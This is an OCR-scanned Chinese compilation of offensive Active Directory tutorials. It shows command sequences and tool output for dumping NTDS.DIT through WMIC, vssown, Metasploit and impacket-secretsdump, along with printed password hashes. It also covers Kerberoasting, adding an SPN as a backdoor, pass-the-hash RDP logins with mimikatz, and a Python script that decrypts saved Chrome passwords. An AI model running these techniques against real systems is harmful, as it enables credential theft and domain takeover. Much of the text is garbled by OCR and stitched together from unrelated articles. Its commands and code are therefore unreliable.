然后 ， 它 远程 执行 复制 命令 ， 以 便 将 NTDS.DIT 文 件 从 卷 影 副本 中 提取 到 目标 系统 上 的 另 一 个 目录 


Wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! pro call cree 


\Users\test PENTESTLAB> wmic /node dc /user PENTESTLAB\Davuid /password pent 
12399 process call create “cmd /c copy \\?\GLOBALROOT\Device\HarddiskUolum 


ng (Win32 Process)-»Create( ) 
od execution successful 
Parameters: 


ance of _ PARAMETERS 


ProcessId = 3476. 
ReturnUalue = 0 





同样 适用 于 SYSTEM 文 件 。 
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wmic /node:dc /user:PENTESTLABNDavid /password:pentestlab123!! process call cref 


PS C:\Users\test PENTESTLAB» umic /node de /user:PENTESTLRBNDauid /password: pent 
lestlabi23't* proce call create “cad /c OBRLROOT\Device\HarddiskUolum 
leShadowCopy! \idindo ystem32\config\SVSTEM emp\ SYSTEM hive 2561^ 

Executing (Win32_Process)->Createl ) 

Method execution successful 


Out Paraeseters 


instance of . PARAMETERS 

{ 
ProcessId = 2884: 
ReturnUalue = 0 





然后 可 以 将 提取 的 文件 从 域 控 制 器 传输 到 另 一 个 Windows 系 统 中 ， 以 转 储 域 密码 哈 希 。 


PS C:\Users\test.PENTESTLAB> \\i0.0.9.i\c$\temp\ntds.dit C:\temp 
PS C:\Users\test.PENTESTLAB> \\L0.0.9.1\ce$\temp\SYSTEM. hive C:\temp 


C:\Users\test PENTESTLAB> copy \\10.0.0.1\cS$\temp\ntds. ait C \temp 


S C:\Users\test PENTESTLAB> copy \\10.0 @.1\c$\temp\SYSTEM hive C \temp 
C-\Users\test PENTESTLAB> w 





如 果 生 成 了 黄金 票证 ， 则 可 以 使 用 Kerberos 代 替 凭 据 进 行 域 控 制 器 的 身份 验证 。 


Vssown 


是 一 个 类 似 于 vssadmin 实 用 程序 由 Tim Tomes 开 发 ， 可 视 化 脚本 ， 可 以 创建 和 删除 卷 影 副 
本 ， 从 已 卸载 的 卷 影 副本 运行 任意 可 执行 文件 ， 并 启动 和 停止 卷 影 副 本 服务 。 


cscript vssown.vbs /start 
cscript vssown.vbs /create C 
cscript vssown.vbs /list 
cscript vssown.vbs /delete 
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可 以 使 用 命令 copy 复 制 所 需 的 文件 。 


copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyii\windows\ntds\ntds.dit C:\v 
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\system32\config\SyY 
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\system32\config\SA 


> 





Metasploit 


Metasploit 框 架 具 有 一 个 模块 ， 该 模块 可 通过 服务 器 消息 块 (SMB) 服务 直接 与 域 控制 器 进行 身份 
验证 ， 创 建 系统 驱动 器 的 卷 影 副本 ， 并 将 NTDS.DIT 和 SYSTEM 配 置 单元 的 副本 下 载 到 Metasploit 目 
录 中 。 这 些 文件 可 以 与 其 他 工具 (例如 impacket) 一 起 使 用 ， 这 些 工具 可 以 提取 Active DirectoryZz 
BEX, 


auxiliary/admin/smb/psexec ntdsgrab 
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msf auxiliary(4 
{*} 10.0.0.1:445 


ce executable... 
[*] 10.0.0.1:445 


ce executable... 
[+] 10.08.6.1:445 
olumeShadowCopyl 
[*] 18.0.0.1:445 
ce executable... 
(*1 10.0.0.1:445 


te executable... 
{+] 10.0.0.1:445 
ce executable... 
í*] 16.6.6.1:445 
[+] 10.0.0.1:445 


run 


«Checking if a Volume Shadow Copy exists alre 
{+} 18.9.5.1:445 - 


Service start timed out, OK if runníng a command or non-servi 


* No VSC Found. 
{*] 10;:0.0.1:445 - 
i+] 10.0.0.1:445 - 


Creating Volume Shadow Copy 
Service start timed out, OK if running a command or non-servi 


: Volume Shadow Copy created on \\?\GLOBALROOT\Device\Harddisky 


Service start timed out, OK if running a command or non-servi 


~ Checking if NTDS.dit was copied. 
{+} 10.0.0.1:445 - 


Service start timed out, OK if running a command or non-servi 


Service start timed out, OK if running a co nd. or non-servi 


Downloading ntds.dit file 


ntds.dit stored at /root/.msf4/100t/20180616103928 default 10 


9.0.1 psexec. Mr 687500.dit 


[*] 10.0.0.1:445 


{+} 10.0.8.1:445 - 


- Downloading SYSTEM hive file 


SYSTEM hive stored at /root/.msf4/1001/20180616103932 default 


106.0.0.1 osexec.ntdsarab. 354683. bin 





还 有 一 个 后 期 开发 模块 ， 可 以 将 其 


Fo 


+ 链接 到 现 有 的 Meterpreter 会 话 中 ， 以 便 通 


windows/gather/credentials/domain_hashdump 


Session has Admin privs 
Session is on a Domain Controller 


Pre- conditions met, 


attempting to copy NTDS.dit 


] Using NTDSUTIL method 
j NTDS database copied to C:\Windows\Temp\nDxhaC\Active DirectoryMntds.dit 


NTDS File Size: 


33554432 bytes 


Repairing NTDS database after copy... 


Initiating REPAIR mode... 


Database: 


Temp. Database 


C:\Windows\Temp\nO0XhaC\Active Directory\ntds dit 
; TEMPREPAIRI192.EDB 


Checking database integrity. 


Scanning Status (* complete) 


Integrity check successful. 


或 者 ， 如 果 存 在 到 域 控制 器 的 现 有 Meterpreter 会 话 ， 则 可 以 使 用 命令 hashdump。 但 是 ， 
安全 ， 因 为 它 可 能 会 使 域 控制 器 骨 溃 。 


hashdump 





(AE) 
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过 ntdsutil 方 法 获取 域 哈 


sp 
:3d3b435b51404ee20d3b435b5140466:8674939c6994d43ab719f147bd502f 





NTDS Extraction 


IrpacketepythonilAMRS, "IRITHAGERES, CHRERINTDSXCÉEISTIAR, BRR 
impacket-secretsdump 需 要 系统 和 NTDS 数 据 库 文件 。 


impacket-secretsdump -system /root/SYSTEM -ntds /root/ntds.dit LOCAL 


binë impacket-secretsdump -system /root/SYSTEM -ntds /root/ntds.d 


- Copyright 2062-2616 Core Security Technologies 


ystem bootKey: Oxcb2b7fcO2ff002968d8dac1722ee9eB8c 
ain Credentials (domain\uid: cid; lmhash:nthash) 

g for pekList, be patient 
) found and decrypted: 


lade5d590e4edc855f8c9f7511375221 
decrypting hashes from /root/ntds.dit 


ocal\Administrator: 506: 3aad3b435b5 1464deeaad3b435b$1404ee: ETT: LEER E] 
3d14fa9829::: 


2ad3b435b5 1404eeaad3b435b5 1404ee: 31d6c fe0d16ae931b73¢59d7e0c 0890: : ; 





此 外 ,lmpack 可 以 使 用 计算 机 帐户 及 其 哈 希 进行 身份 验证 ， 从 NTDS.DIT 文 件 远程 转 储 域 密码 哈 
3. 


impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e 


hin# impacket-secretsdump -hashes aad3b435b51464e¢eaad3b435b51404e 
fb3l4e268C4C6a65dfc9 -just-de PENTESTLAB/dc\$610.6.9.1 
3.15 - Copyright 2062-2016 Core Security Technologies 


Dumping Domain Credentials (domain\uid: rid: Umhash:nthash) 
ing the DRSUAPI method to get NTDS.DIT secrets 


trator: 560: aad3bh435b514@4eeaad 3b435b51484ee : 8674939C699d4aab719Ff 147 bdSd2t 


501: aad3b435b$ 1464eeaad3b435b51404ee ; 31d6c fe0d 16ae931b73cS9d7e0cO89C0: 
E àaad3b435b51404eeaad3b435b51404ee:37a7a8d9b8l4c5eca908617¢€736¢017d::: 
ount : 503: aad3b435b5 1404eeaad3b435b5 1464ee : 3ld6c feGd 16ae931b73¢59d7e6c9 


lab. local\david: 1104: aad3b435b5 1404eeaad3b435b51404ee: fa7alcc717Aa3d1704fa 
20ef::: 


tab. Local\ jane: 1165: aad3b0435b51464eeaad3b435b51404ee: fa7alec71763d1704fa9 


0fe29ef::: 


986: aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fíb314e268c4c6a65dfc9: :: 
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作为 Impacket 的 替代 解决 方案 ， npEx 二 进 制 文件 可 以 从 Windows 主 机 提取 域 密码 哈 希 。 


NTDSDumpEx.exe -d ntds.dit -s SYSTEM.hive 


ampixiexe - 


ACCOUNTS 0 machines, O histories. 





还 有 一 个 shell 脚 本 it， 可 以 将 用 户 名 和 密码 哈 希 导出 为 一 种 格式 ， 该 格式 可 以 被 常见 的 密码 
破解 工具 (例如 John the Ripper 和 Hashcat) 使 用 。 


./adXtract.sh /root/ntds.dit /root/SYSTEM pentestlab 


{+} Started at: Thu, 14 Jun 2018 16:35:81 UTC 
+) Started with options: 
[-] Extracting password hashes 
[-] Hash output format: ophc 
[-] LM hash output filename: /root/adXtract/adXtract pentestlab/pentestl 
ab alltMhashes.txt 
[>] NT hash output filename: /root/adXtract/adXtract pentestlàáb/pentestl 
b allNTLMhashes. txt 
1°} CSV output filename: /root/adXtract/adXtract pentestlab/pentestlab U 
serAccountOut.csyv 
+} Initialising engine... 
[*] Loading saved map files (Stage 1)... 
[!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/r 
)ot/adXtract/adXtract pentestlab/Maps/offlid.map' 
{+} Rebuilding maps... 
[+] Scanning database - 100% -> 8277 records processed 
[+] Sanity checks... 
Schema record id: 2030 
Schema type id: 10 
{+} Extracting schema information - 160% -> 4486 records processed 
[+] Loading saved map files (Stage 2)... 


该 脚本 会 将 所 有 信息 写 入 项 目 名 称 下 的 各 个 文件 中 ， 并 且 在 完成 数据 库 文件 NTDS 的 解密 后 ， 会 将 
用 户 列表 和 密码 哈 希 导出 到 控制 人 台中。 该 脚本 将 提供 有 关 域 用 户 的 大 量 信 息 ， 如 下 所 示 : 
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3917 

Administrator 
Administrator@pentestlab. local 
Administrator 

SAM NORMAL USER ACCOUNT 
Sb6ef3c8-362a-4954-98ad- f14ef 3062052 
§-1:$-21- 3737346914 - 2619594255 -2413685307- $60 
2618-63-18 .07:53:62+60: 906 

2018-06- 14:26:04+00:00 

Never ; 

2018-06. 14:26:04.684887+06: 60 
7018-906- 14:55:19.814484+900: 60 
2018-06- 13:62:34.337919+66: 06 
2018-05- 14:41:42.608929400:00 

329 

8 

Controlled by policy 


~3737340914-2619 


96¢74d59a86da0126d2ace1e8d211693:S-1-5-21-3737346914- 2019 


> resg7bfistiblefesa64s2t7f4aszef47bea: *S* 21+3737346914- 2019 


2: 91df47be920595.1478d86deb354¢5f40:S-1-5-21-3737340914 2619 
>: OcOled6bfce33f9e16F851e64al2beed: -21-3737340914-2819 
:::dd8eaad8bdf3ad1aa743bc6f57965925:5-1-5-21- 3737340914 - 2019 


:c85babdbadf3cb8ce6288615delbbb?b 3737340914-2019 

307-1 sc 

7299fd5:: :babcfd69ba43c5 f96fbO33a40343452c:S-1-5-21-3737340914-2619 
@7-1148:: 

C601d86¢43ce4894dab79bal £45144:S-1-5-21- 3737340914 - 2619594255 - 241368536 


84478135a93ac3bfeS8a5eade8fdb71:S-1-5-21-3737340914 - 2619594255 : 241368530 


891: ::58a478135a93ac3bfossaseasesfdb71:5-1-5-21- 3737340914 - 2019594255 





总 得 来 说 ， 目 的 是 为 了 获取 NTDS.DIT 数 据 库 文件 中 的 数据 ， 功 能 和 方法 都 百 变 不 离 其 宗 ， 
Windows API, 
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SPN 发 现 与 利用 
SPN 发 现 与 利用 


0x00 关于 SPN 


服务 主体 名 称 (SPN) 是 Kerberos 客 户 端 用 于 唯一 标识 给 特定 Kerberos 目 标 计 算 机 的 服务 实例 名 
FR. Kerberos 身 份 验证 使 用 SPN 将 服务 实例 与 服务 登录 帐户 相关 联 。 如 果 在 整个 林 中 的 计算 机 上 安 
装 多 个 服务 实例 ， 则 每 个 实例 都 必须 具有 自己 的 SPN。 如 果 客 户 端 可 能 使 用 多 个 名 称 进 行 身份 验 
证 ， 则 给 定 的 服务 实例 可 以 具有 多 个 SPN。 通 过 SPN， 可 快速 定位 开启 了 关键 服务 的 机 器 ， 这 样 就 
不 需要 去 扫 对 应 服务 的 端口 ， 有 效 规避 端口 扫描 动作 。 


0x01 SPN 格 式 


Idap/WIN-6BCSAT1ED2BP.cate4cafe.com(:port)/CATEACAFE 
服务 类 FQDN 端口 服务 名 
服务 类 和 FQDN 是 必需 参数 ， 端 口 和 服务 名 是 可 选 的 
0x02 setspn 


setspn 是 系统 自 带 的 查找 和 设置 spn 的 命令 
。 2.1 列 出 注册 的 spn 
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.psnssql?setspn -1 WIN-6BCSALED2BP 
„red ServicePrincipalNames A+ CN=WIN-6BCSAL1ED2BP,0U=Domain Controllers .D 
4cafe,DC=com: 
D£sv—-12F9A27C-BF? 7-478 7-9 364-D31 BECSSEBG4 AI N-6 BCSALED2ZBP.cate4cafe.com 
ldap/WVIN-6BCSALED2ZBP .cate4cafe.com/ForestDnsZones.cate4dcafe.com 
Idap/WIN-6BCSALED2ZBP.catedcafe-com/DomainDnsZones .cate4cafe.com 
DNS/WIN-6BCSALEDZBP cate4cafe.con 
GC/UIN-6BCSR1ED2BP.catedcafe.com/catedcafe.com 
RestrictedKrbHost^/UIN-6BCSRA1ED2BP.catedcafe.com 
RestrictedKrbHost/WIN-6BCSA1 ED2BP 
RPC/57165553-4e2e—-4c29—-9fec-aacd3abab8078. msdcs.catedcafe.com 
HOST/UIN-6BCSAR1ED2BP^/CRTEAGAFE 
HOST/WIN-GBCSALED2BP . catedcafe -com/CATE4CAFE 
HOST/UIN-6BCSR1ED2BP 
HOST/WIN-6 BCSALED2BP.cate4dcafe.com 
HOST/VIN-6BCSALED2ZBP .cate4eafe .com/cate4cafe.conm 
E3514235-4B86-11D1 -A BU4-88CB84FC2DCD2/57165553—4e2e—-4c29 -9f ec-aacd3abab9" 
)/cateácafe.com 
ldap/WLN-6 BCSA1 ED2 BP/CAT E4SCAFE 
ldap/5716b553-4e2e—4c29-9f ec-aacd3abahO@74._msdcs .cate4cafe.com 
ldap/VIN-6BCSALED2ZBP.cate4cafe .com/CATE4CAFE 
ldap/WIN-6BCSALED2BP 
ldap/VIN-6BCSALED2ZBP .cate4cafe.com 
ldap/WIN-6 BCSALED2BP .cate4dcafe.com/cate4dcafe.com 





-| 参数 接受 计算 机 名 或 者 用 户 名 
。 2.2 配置 spn 


CN=MSSQL,.CN=Computers.DC=catedcafe,.DC=com EH ServicePrincipalNames 
hCt ARSE Sree come Ean 


»> Users \Administrator>setspn -L mssql 
Registered ServicePrincipalNames AF CN=MSSQL.CN=Computers .DC=cate4cafe.DC=com: 





http/mssql.cate4cafe.com 


* 2.3 在 指定 的 域 或 林 上 查询 SPN 
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PS C:Wisers nunssql2? setspn -T cate4cafe -Q */* 
企 检 查 二 DC-cate4cafe.DC-conm 

N-WIN-GBCSR1ED2BP,OU-Domain Controllers,DGC-catedcafe.DC-com 
Dfsr-12F98027C-BE97-4787—9364-D31B6C55 EBO4/UIN-6 BCSALEDZBP .catedcafe .con 
ldap/UIN-6BCSAR1ED2BP.catedcafe.com/ForestDnsZones.catedcafe.com 
ldap/WIN-6BCSR1ED2BP.cate4cafe.com/DomainDnsZones.catedcafe.com 
DNS/MIN-6BCSO1ED2BP.catedcafe.com 
GC/WIN-6BCSALED2BP .catedcafe.com/cate4cafe.con 
RestrictedKrbHost7WIN-6BCSALED2ZBP.cate4dcafe.com 
RestrictedKrbHost/UIN-6BCSAR1ED2BP 
RPC/5716h553—4e2e—4c29-9fec-aacd3Jabab878.. nsdcs.catedcafe.com 
HOST/UIN-6BCSARA1ED2BP^/CATEACAHFE 
HOST /WIN-6BCSALED2BP. cate4cafe.com/CATE4CAFE 
HOST/WIN-6BCSALED2BP 
HOST/WIN-6BCSALED2BP.cate4dcafe.com 
HOST/VIN-6BCSALED2BP .cate4cafe.com/cate4cafe.com 
E3514235-4B@6-11D1~-ABG4-GBCB4FC2DCD2/5 716b553—4e2e-4c29-9f ec-aacd3abah@ 

B/catedcafe.com 
ldap/WIN-6BCSALED2BP/CATE4CAFE 
Idap/5716b553—4e2e—-4c29-9f ec—aacd3ahbahO@7@._msdcs .catedcafe.com 
Idap/WIN-6BCSALED2BP.cate4cafe.com/CATEACAFE 
ldap/WIN-6BCSALED2 BP 
ldap/UIN-6BCSA1ED2BP.catedcafe.com 
ldap^/UIN-6BCSfi1ED2BP.catedcafe.com/catedcafe.com 


sllsers 
à 





0x03 SPN 扫 描 工 具 


PS C:\Users\mssq!\Desktop> C:\Users\mssqi\Desktop\GetUserSPpNs.psl 


ervicePrincipalName : kadmin/changepw 

ame : krbtgt 

ISAMACCountName : krbtgt 

emberOf : CN=Denied RODC Password Replication Group,CN-Users,DC-catedcafe,DC-com 
Passwordt astSet : 2019/9/6 13:12:01 


PS C:\Users\mssql\Desktop> Find-PSServiceAccounts 
Discovering service account SPNs in the AD Domain cate4cafe.com 


cate4cafe.com 

krbtgt 
PasswordLastSet £ 09/06/2019 05:12:01 
astLogon 01/01/1601 00:00:00 
Description 密 钥 发 行 中 心服 务 帐 户 
SPNServers R 
SPNTypes {kadmin} 
ServicePrincipalNames {kadmin/changepw} 
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7 \pesktop> Get-SPN -type service -search "*" -List yes | Format-Table 


Server Service 


changepw 
MSSQL 


MSSQL RestrictedKrbHost 
MSSQL TERMSRV 
mssql WSMAN 
Mssql.cate4cafe. HOST 
mssql.cate4cafe. http 
mssql.cate4cafe. MSSQLSvc 
Mssgl.catedcafe. RestrictedKrbHost 
Mssql.catedcafe. TERMSRV 
mssql.catedcafe. WSMAN 
WIN10 HOST 
WINLO nee ay ctedkrbHost 
UN Se ake com 

ni0.c cafe. co haste ictedKrbHo: 
$716b553- fede. 4c29- 9fec-aacd3abab070 £3514235-4B806- 1ipi- AB04 -00cO4FC20CD2 
5716b553-4e2e-4c29-9fec-aacd3abab070... ldap 
5716b553-4e2e-4c29-9fec-aacd3abab070... RPC 
WIN-6BCSAlED2BP HOST 
WIN-6BCSAIED2BP IP ET 
WIN-6BCSALED2BP RestrictedKrbHost 
WIN-6BCSAIED2BP.cated4cafe. Dfsr-12F9A27C-BF97 -4787 -9364-D3186C5... 
WIN-6BCSAIED2BP.cate4cafe. DNS 
WIN-6BCSA1ED2BP.catedcafe. GC 
WIN-6BCSAlED2BP.cate4cafe. HOST 
WIN-6BCSALED2BP. cate4cafe. ldap 
WIN-6BCSALED2BP. cate4cafe. RestrictedKrbHost 


GetUserSPNs.| 


支持 非 域内 机 器 扫描 查找 


0x04 Kerberoasting 


知道 相关 服务 的 SPN 后 ， 可 以 用 SPN 申 请 一 张 票据 ST， 如 果 Kerberos 协议 设置 票据 为 RC4 加 密 ， 
则 可 通过 爆破 的 方式 得 到 服务 对 应 用 户 的 密码 。 


:\Users\Administrator> klist 
D 是 0:0x411df 
(2) 


m: Administrator (à CATE4CAFE.COM 
2%: krbtgt/CATE4CAFE.COM @ CATE4CAFE .COM 


Kerberos 票证 加 密 类 型 : RSADSI RC4-HMAC (NT) 
标志 0x40e10000 -> forwardable renewable initial pre authent name. canonicalize 
B]: 10/11/2019 14:37:38 (本地) 
T Uo 
B, 
铀 类 型 : RSADSI RC4-HMAC(NT) 
eee Ox1 -> PRIMARY 
WMA ÁI KDC: WIN-6BCSAIED2BP 





Bib, 申请 票据 ， 在 powershell 上 


Add-Type -AssemblyName System.IdentityModel 


NEW - System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentL 


使 用 Klist 查 看 票据 申请 是 否 成 功 。 接 着 可 使 用 mimikatz 导 出 票据 ， 再 通过 hashcat 爆 破 即 可 。 或 者 使 
用 


Invoke 导出 转换 成 John the Ripper 或 者 HashCat 能 够 直接 爆破 的 字符 串 。 


在 我 们 取得 了 SPN 的 修改 权限 后 ， 可 以 为 指定 的 域 用 户 添加 一 个 SPN， 这 样 可 以 随时 获得 该 域 用 
局 的 TGS ， 经 过 破解 后 获得 明文 口令 ， 可 以 作为 一 个 后 门 使 用 
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哈 希 传递 -远程 登录 篇 
介绍 


内 网 扩展 中 ，Windows2012 以 上 (包括 ) 默认 用 户 登 陆 是 不 会 记录 明文 密码 的 ， 本 文 介绍 在 只 有 
NTLM Hash 的 情况 下 实现 远程 登陆 ， 附 最 近 护 网 中 的 实例 。 


条 件 


。 Windows 8.1 和 Windows Server 2012 R2 默 认 支 持 该 功能 
。 Windows 7 和 Windows Server 2008 R2 默 认 不 支持 ， 需 要 安装 补丁 2871997、2973351 


参考 资料 : 








注 : 如 果 不 支持 ， 注 册 表 添加 键 也 无 效 ， 需 要 先 安装 补丁 


开启 Restricted Admin Mode 


修改 注册 表 | 


HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa 
新 建 DWORD $€{H DisableRestrictedAdmin , (AN 0 , tRAB IA 1, REXHA 命令 行 : 
添加 注册 表 


REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t 


> 


服务 端 and 客户 端 都 需要 开启 Restricted Admin mode， 服 务 端 没 有 开启 ， 会 出 现 连接 受 限 。 
尝试 不 输入 口令 直接 登录 


mstsc /restrictedadmin 


Windows7 不 支持 ， 安 装 补 丁 : 
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"s MSTSC [«connection file>] [/ 
l [/f{ullscreen]] [/w:«width» /h: 











<server(:port]>] [/admin] 
height» ] [/public] | /span] 
[/multimon] U [migrate] [/edit "connection file"] 





"connection file" -- 





Jv:sserver[;port]» -- 指定 要 注 接 到 的 远 得 计算 机 。 





fadmin -- 14:5 





/f -~ 以 全 
Aw<width> -- 指定 远程 豪 面 窗口 约 完 度 ， 
Ah:<height> -- 指定 远程 衰 面容 口 约 高 度 ， 


fpublic -- 在 公有 局 模式 





/span -- '&unfez3 
g^ 


BMF TS. SEARRE R, wee MR la 
NE. 
/multimon -- 将 江 担 豪 面 会 活 监 视 路 布局 配置 为 与 当前 的 客 产 渤 配 置 柜 





{migrate -- i£ 
RDP ER. 


p 


fill 


Win10 正常 打开 : 
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利用 演示 


Mimikatz 版 本 


privilege::debug 


sekurlsa::pth /user:administrator /domain:test /NTLM:580aa70108effe6a /run:"msts 


exe /restri 


rictedadmin 
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system32\cmd.exe 


Cc: Nsers Administrator >whoani 
; ‘administrator 


cr:Nsers Mdninistrator>ipconfig /all 


Jindows IP RA 


pRequ 
ecutel 
te < Del 
bstra 
bstr 
à | Micrc 
gr 于 
DHCPu6 IAID 
DHCPo6 S Milh 


2 


DNS 服务 器 22 
TCPIP LH] NetBIOS 


媒体 已 断 开 


Microsoft ISATAP Adapter #2 
90-00-80-09-00-00-00-EO 
ZA 


Internet 地 址 
172 
1?2 
1°22 
172 
122 
172 
172 
172 
172 
172 





BHP3 En 
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天 目标 文件 中 做 信息 搜集 第 一 季 
四 标 文件 中 做 信息 搜集 第 一 季 


。 Exiftool 简 介 : 


蕊 00| 可 读 写 及 处 理 图 像 、 视 频 及 音频 ， 例 如 Exif、IPTC、XMP、JFIF、GeoTIFF、ICC Profile. 
害 括 许多 相机 的 制造 商 信息 读 取 ， 如 佳能 ， 卡 西欧 ， 大 强 ，FLIR， 三 星 等 。 


同样 它 支持 多 国语 言 


:/tmp# e bert -lang 
5 lable langi 1 


German (Deutsch) 
English 
EC ad Engl 


- French (Francais) 


~ Italian asta 
IE Japanese (日 本 语 ) 
KO - Korean (p p D? 


d 
y- sh (Svenska) 
tr - Turkis h (Türkce) 
zh-cn - Simplified Chinese {简体 中 文 ) 
zh-tw - Traditional Chinese (Zety) 
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t * 


‘ * * 
root@John:/tmp# exiftool -lang zh-cn -a -u -g1 ./55e736d12f2eb9385716e513d86285; 





---- ExifTool ---- 

ExifTool 版 本 ILG 

---- System ---- 

文件 名 : 55e736d12f2eb9385716e513d8628535e4dd6fdc .jpg 
文件 存储 位 置 

文件 大 小 : 84 kB 

更 新 日 期 : 2019:01:20 20:07:57-05:00 
File Access Date/Time ` : 2019:01:21 08:00:14-05:00 
File Inode Change Date/Time : 2019:01:21 07:59:58-05:00 
File Permissions fofW-r--r-- 

---- File ---- 

文件 格式 : JPEG 

File Type Extension URDU 

MIME Type : image/jpeg 

像 宽 : 580 

像 高 Vi 

Encoding Process : Baseline DCT, Huffman coding 
每 个 组 件 的 比特 数 28 

Color Components 5 € 


YCC 像素 结构 (Y 至 C 的 子 采样 率 ) : YCbCr4:2:0 (2 2) 


-FIE -= 
JFIF 版 本 : 1.01 
图 像 高 宽 分 辨 率 单位 本 
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Y Resolution 203 


ENcomposite ---- 


ARRI : 580x773 
48 


‘tmp# exiftool -lang zh-cn -a -u -gl ./55e736d1212eb93857166513d8628535e4dd6f dc. jpg 
ExifTool ---- 


i 11.16 


: 55e736d12f2eb93857166513d8628535e Add6fdc . jpg 


Date/Time 
Date/Time 
REA B, Ara Sha hy 


: JPEG 


: Jpg 
: image/jpeg 


: S80 
Ta 
: Baseline DCT, Huffman coding 


ution 
ution 
Composite ---- 
BRR : 580x773 
Megapixels : 0.448 





往 大 型 内 网 渗透 中 ， 尤 其 是 针对 办 公 机 的 渗透 ， 需 要 熟知 目标 集体 或 者 个 人 的 作息 时 间 ， 工 作 时 

加 时 文档 时 间 ， 咖 啡 时 间 ， 或 者 需要 从 某 些 文件 中 获取 对 方 的 真实 拍摄 地 坐标 等 。 那 么 无 疑 需要 快 
速 的 从 大 量 文件 中 筛选 信息 诉求 。 当 目标 越 复杂 ， 文 件 中 的 信息 搜集 就 更 为 重要 。 如 文档 作者 ， 技 
本 文章 作者 ， 财 务 文档 作者 等 ， 熟 知 在 大 量 人 员 ， 获 取 对 方 职 务 ， 大 大 减少 渗透 过 程 中 的 无 用 性 ， 
重复 性 ， 可 见 性 。 与 暴露 性 。 而 作为 公司 ， 应 该 熟悉 相关 文档 的 内 置 属性 ， 尤 其 是 在 共享 文件 服务 
训 上 删除 或 者 复写 敏感 信息 来 降低 企业 安全 风险 。 





AN s ds 


mm hn 
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获取 当前 系统 所 有 用 户 的 谷歌 浏览 器 密码 
0x01. 知识 简介 


1. DPAPI: 


全 称 Data Protection Application Programming Interface 
Windows 系 统 的 一 个 数据 保护 接口 
主要 用 于 保护 加 密 的 数据 ， 常 见 的 应 用 如 : 


Internet Explorer, Google Chrome 中 的 密码 和 表单 
存储 无 线 连接 密码 

远程 桌面 连接 密码 

Outlook, Windows Mail, Windows Mail 等 中 的 电子 邮件 帐户 密码 
内 部 FTP 管 理 员 帐 户 密码 

共享 文件 夹 和 资源 访问 密码 

Windows Credential Manager 

Skype 

Windows CardSpace 

Windows Vault 


EFSX fF hun 
2. DPAPI blob: 
一 段 密 文 ， 可 使 用 Master Key 对 其 解密 


3. Master Key: 


64 字 节 ， 用 于 解密 DPAPI blob， 使 用 用 户 登 录 密 码 、SID 和 16 字 节 随 机 数 加 密 后 保存 在 Master Key 
file 中 
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ier Key file: 
件 ， 可 使 用 用 户 登录 密码 对 其 解密 ， 获 得 Master Key 


er Key file, {iF%APPDATA%\Microsoft\Protect\%SID% — 存储 用 户 的 登陆 密码 


B: %APPDATA%\Microsoft\Protect\%SID% ， 该 目录 下 往往 有 多 个 Master Key file, 3X 
全 起 见 ， 系 统 每 隔 90 天 会 自动 生成 一 个 新 的 Master Key( 旧 的 不 会 删除 ) 


ferred 文 件 : 
er Key file 的 同 级 目录 ， 显 示 当前 系统 正在 使 用 的 MasterKey 及 其 过 期 时 间 ， 默 认 90 天 有 效 


在 线 解密 当前 用 户 google 浏 览 器 下 保存 的 密码 
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# 在 线 获取 当前 用 户 goog1e 浏 览 器 下 保存 的 密码 
import os, sys 
import shutil 
import sqlite3 


import win32crypt 


db file path = os.path.join(os.environ['LOCALAPPDATA'], r'Google\Chrome\User Dat — 


print(db file path) 


# tmp file = os.path.join(os.path.dirname(sys.executable), 'tmp tmp tmp') 
tmp file - './loginData' 
print(tmp file) 
if os.path.exists(tmp file): 
os.remove(tmp file) 


shutil.copyfile(db file path, tmp file) 


conn = sqglite3.connect(tmp file) 
for row in conn.execute('select signon realm,username value,password value from 
try: 
ret = win32crypt.CryptUnprotectData(row[2], None, None, None, 0) 
print('url: %-50s username: %-20s password: %s' % (row[0], row[1], ret[1] 
except Exception as e: 
print('url: %-50s get Chrome password Filed...' % row[0]) 


pass 
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conn. close( ) 


9e rremove (tmp. file) 


t-sqlite3 
t win32crypt 


le “path, tmp file) 


file) 


conn. close() 
os.remove(tmp file) 


if o5.path.existsttmp file) 


/Desktop/py/BrowserPwd/demo. py 
Chrome\User Data\Default\Login Data 


get Chrome password Filed... 
username: dsfdsfgfdsf.com password: 121121121 


0x03. 离线 导出 当前 系统 下 另 一 用 户 的 Chrome 密 码 


使 用 工具 Windows Password Recovery 

解密 需要 获得 三 部 分 内 容 : 
* M255 (B0Master Key file)， 位 于 %appdata%\Microsoft\Protect 下 对 应 sid 文 件 夹 下 的 文件 
和 数据库 文件 Login Data 
全 用 户 明 文 的 密码 ， 用 于 解密 加 密 密 钥 


环境 模拟 - 


环境 : 一 合 Windows10 机 器 ， 里 面 装 有 谷歌 浏览 器 ， 用 户 有 administrator 和 test 等 等 其 他 用 户 





BB: 当 我 们 拿 到 shell 后 ， 当 前 用 户 是 administrator， 我 们 想 要 获取 test 等 其 他 用 户 在 当前 系统 保存 
的 谷歌 浏览 器 密码 。 


MRR: 需要 知道 test 账 户 的 明文 密码 ， 可 以 通过 导 注册 表 方 法 获取 test 的 明文 密码 


工具 : py 编译 后 的 exe 工 具 
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filepack.exe 执 行 后 会 获取 
1. 所 有 用 户 谷 歌 浏览 器 的 Login Data 文 件 
2. 获取 所 有 用 户 的 master key file 
3. 获取 所 有 用 户 的 rdp 保 存 凭 证 (该 文件 用 来 破解 RDP， 此 处 无 用 ) 
如 下 图 是 flepack.exe 执 行 的 结果 ， 会 在 当前 目录 生成 三 个 压缩 文件 





goole.zip 是 所 有 用 户 谷 歌 浏览 器 的 Login Data 压 缩 包 
protect.zip 是 所 有 用 户 的 master key file 压 缩 包 
rdp.zip 是 所 有 用 户 的 rdp 保 存 凭证 压缩 包 
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ch login data(path, name): 

Eo, dirs, files in os.walk(path): 

df name in files: 

root - str(root) 

login data path = root + '\\' + name 


return login_data_path 


有 用 户 的 谷歌 的 Login Dataxft 


in data(): 


Name = 'Login Data' 


for user name in os.listdir(users dir): 
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= os.environ['userprofile'].rsplit('\\', 1)[0] 


